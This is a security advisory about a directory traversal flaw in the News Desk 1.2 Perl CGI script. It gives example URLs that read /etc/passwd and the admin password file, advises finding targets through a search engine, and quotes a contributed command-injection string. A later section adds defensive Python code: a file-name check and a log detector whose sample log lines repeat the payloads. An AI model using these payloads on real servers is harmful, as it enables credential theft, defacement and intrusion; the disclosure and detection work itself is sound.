[ SOURCE: http://www.secureroot.com/security/advisories/9786224444.html ]

Introduction:

News Desk 1.2 (newsdesk.cgi) is a news submission script written in Perl that allows someone on a remote computer to connect to the server and post news submissions without logging into the actual server. By logging into the CGI with a custom login and password (pass.txt), the admin is able to post the latest headline news to his/her website with ease.

The vendor's website is: http://www.ibrow.com

Problem:

Adding the string "/../" to a URL allows an attacker to view any file on the server, and also to list directories on the server which the owner of the vulnerable httpd has permission to access.

Examples:

http://www.VULNERABLE.com/cgi-bin/newsdesk.cgi?t=../../../../etc/passwd
^^ = Will obviously open the passwd file, if unshadowed.

http://www.VULNERABLE.com/cgi-bin/newsdesk.cgi?t=../pass.txt
^^ = Will open the password string which can be used to log in to newsdesk.cgi and post new news, or, with special variables, to upload/post HTML to the htdocs directory, possibly leading to a defacement of the webpage.

http://www.VULNERABLE.com/cgi-bin/newsdesk.cgi?t=../../../../etc/
^^ = Will obviously list the /etc/ directory. Not all servers will list directories, but most appear to.

Note:

It depends on where they install newsdesk.cgi; it is not always in a cgi-bin, so it could be installed under any path. Just go to your favorite search engine and search for newsdesk.cgi and voila. There are also some other variants of this CGI script out there, most of them noticeable by the news.cgi?a=something&t=meow.html format. Notice the a= & t=, which is a clear give-away to Newsdesk.

Solution:

The vendor has been contacted and will release an updated version which is supposed to be more secure...
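As an added illustration (not part of the original advisory, and not the vendor's code), the following Python shows the two defensive pieces this advisory points at: a file-name check that refuses the traversal in the t= parameter before it reaches the filesystem, and a detector that flags such requests in web server access logs. The news directory and the log lines are constructed assumptions.

```python
import os
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Hypothetical location of the news files; the real install path varies.
NEWS_DIR = "/var/www/newsdesk/news"
# Allowlist: the script only ever needs to serve plain news files.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.html$")
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")


def resolve_news_file(t, base_dir=NEWS_DIR):
    """Return the path for news file `t`, or None if it must be refused.

    Two independent checks: the allowlist rejects anything that is not a
    bare .html name (newsdesk.cgi accepted any string for t=), and the
    containment check keeps the normalised path inside base_dir.
    """
    if not SAFE_NAME.match(t):
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, t))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def is_traversal_request(log_line):
    """True for an access-log line that calls newsdesk.cgi with a t=
    value containing '..' or a shell pipe after (double) URL-decoding."""
    m = re.search(r'"(?:GET|POST|HEAD) (\S+) ', log_line)
    if not m or "newsdesk.cgi" not in m.group(1).lower():
        return False
    query = unquote(unquote(urlsplit(m.group(1)).query))
    for value in parse_qs(query, keep_blank_values=True).get("t", []):
        if TRAVERSAL.search(value) or "|" in value:
            return True
    return False


# Constructed sample log lines in common log format (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [03/Jan/2001:10:00:01 +0000] "GET /cgi-bin/newsdesk.cgi?t=../../../../etc/passwd HTTP/1.0" 200 1421',
    '10.0.0.5 - - [03/Jan/2001:10:00:02 +0000] "GET /cgi-bin/newsdesk.cgi?t=%2e%2e%2fpass.txt HTTP/1.0" 200 57',
    '10.0.0.9 - - [03/Jan/2001:10:01:00 +0000] "GET /cgi-bin/newsdesk.cgi?a=view&t=meow.html HTTP/1.0" 200 3302',
    '10.0.0.9 - - [03/Jan/2001:10:01:05 +0000] "GET /index.html HTTP/1.0" 200 512',
]


def suspicious_lines(lines=SAMPLE_LOG):
    """Return the log lines that look like newsdesk.cgi traversal attempts."""
    return [line for line in lines if is_traversal_request(line)]
```

The second sample line shows why the detector decodes before matching: a percent-encoded `..` reaches the script exactly like the literal form.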
Special Thanks to: zenomorph, who contributed this:

Remote command execution is possible on most sites if you use the correct directory syntax, such as ../../../bin/ls%20/| which is a working example; many more commands are possible if you play around with it a bit, such as spawning xterms.

--------------------

Found By: b10z cgi advisory. slipy@b10z.net
Found on December 10th, 2000. Posted to BugTraq Jan 3rd, 2001.